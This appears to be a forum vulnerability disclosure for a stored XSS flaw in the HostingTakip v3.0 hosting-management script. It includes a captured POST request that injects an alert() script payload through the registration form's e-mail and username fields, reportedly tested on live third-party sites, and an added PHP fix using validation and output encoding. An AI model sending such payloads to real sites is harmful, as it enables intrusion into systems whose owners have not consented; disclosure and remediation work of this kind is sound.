HostingTakip v3.0 - Stored XSS Vulnerability
#1
www.deccal.org

Web App: HostingTakip
Affected Version : v3.0
Software: http://www.hostingtakip.com & http://wmscripti.com/php-scriptler/hosti...ripti.html
Official Demo: http://hostingtakip.teknoder.com/demo/
RISK: Medium
Tested On: [L] Windows 7, Mozilla Firefox
####################INFO################################
An XSS payload can be run in the registration form.
Click on "Yeni Müşteri"; here the e-mail field appears unprotected, with no filtering.
Any payload entered is stored permanently on "uye-duzenle.php" and will execute there.
########################################################
Tested on:
http://www.ayashosting.com
http://www.oneritasarim.com/hostingtakip/
----------------------------------------------------------
Request
----------------------------------------------------------
POST http://www.oneritasarim.com/hostingtakip...amamla.php
Request Headers:
Host[www.oneritasarim.com]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[http://www.oneritasarim.com/hostingtakip/y_kullanici.php]
Cookie[PHPSESSID=1b4b474c7fc50e0885aae61274ac0b55; __utma=221857094.828791546.1426246879.1426246879.1426246879.1; __utmc=221857094; __utmz=221857094.1426246879.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)]
Connection[keep-alive]

Post Data:
Code:
kadi[%3C%2Fscript%3E%3Cscript%3Ealert%28%27h4+Here%27%29%3C%2Fscript%3E]
posta[%3C%2Fscript%3E%3Cscript%3Ealert%28%27h4+Here%27%29%3C%2Fscript%3E]
sifre[123456]
ad[123456]
tc[012345678901]
tel[12345678901]
mustip[b]
sehir[h4]
ilce[h4]
adres[h4x0resec.blogspot.com]
hakkimda[h4]
guv[1b4b47]
B1[G%F6nder]
Response Headers:
Code:
Content-Encoding[gzip]
Vary[Accept-Encoding]
Date[Fri, 13 Mar 2015 12:18:10 GMT]
Server[LiteSpeed]
Connection[close]
Expires[Thu, 19 Nov 1981 08:52:00 GMT]
Cache-Control[no-store, no-cache, must-revalidate, post-check=0, pre-check=0]
Pragma[no-cache]
Content-Type[text/html]
Content-Length[143]
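The post above reports that the "posta" (e-mail) field of the registration form is stored without filtering and later rendered on uye-duzenle.php, which is the classic stored-XSS pattern. The following is an added illustration, not HostingTakip's own code: it takes the URL-encoded payload from the request above as constructed sample input, shows the unsafe render beside a hardened one, and validates the field before storage. The function names (validate_posta, h, render_unsafe, render_safe) and the table-cell output context are assumptions made for the example.

```php
<?php
// Added example, not part of the HostingTakip script. Field name "posta" and
// the payload are taken from the request above; everything else is assumed.
declare(strict_types=1);

/** Reject anything that is not a syntactically valid e-mail before it is stored. */
function validate_posta(string $raw): ?string
{
    $email = filter_var(trim($raw), FILTER_VALIDATE_EMAIL);
    return $email === false ? null : $email;
}

/** Output encoding: every stored value is untrusted when written into HTML. */
function h(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

/** Vulnerable pattern: the stored value is echoed straight into the page. */
function render_unsafe(array $user): string
{
    return '<td>' . $user['posta'] . '</td>';
}

/** Hardened pattern: same markup, value encoded at the point of output. */
function render_safe(array $user): string
{
    return '<td>' . h($user['posta']) . '</td>';
}

// Constructed sample input: the "posta" value from the request above, URL-decoded.
$payload = urldecode('%3C%2Fscript%3E%3Cscript%3Ealert%28%27h4+Here%27%29%3C%2Fscript%3E');

var_dump(validate_posta($payload));              // NULL: rejected before storage
var_dump(validate_posta('musteri@example.com')); // string(19): accepted

$user = ['kadi' => 'test', 'posta' => $payload];
echo render_unsafe($user), PHP_EOL; // <script> tags land in the page: stored XSS
echo render_safe($user), PHP_EOL;   // &lt;script&gt;... shown as text, never executed
```

Input validation alone is not enough here: an address that passes FILTER_VALIDATE_EMAIL can still contain characters that matter in other contexts, so the encode-on-output step in render_safe is the control that actually prevents the stored payload from executing, and validation only narrows what reaches the database.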
#2
Nice work, mate, exciting
www.deccal.org


#3
Nice work, bro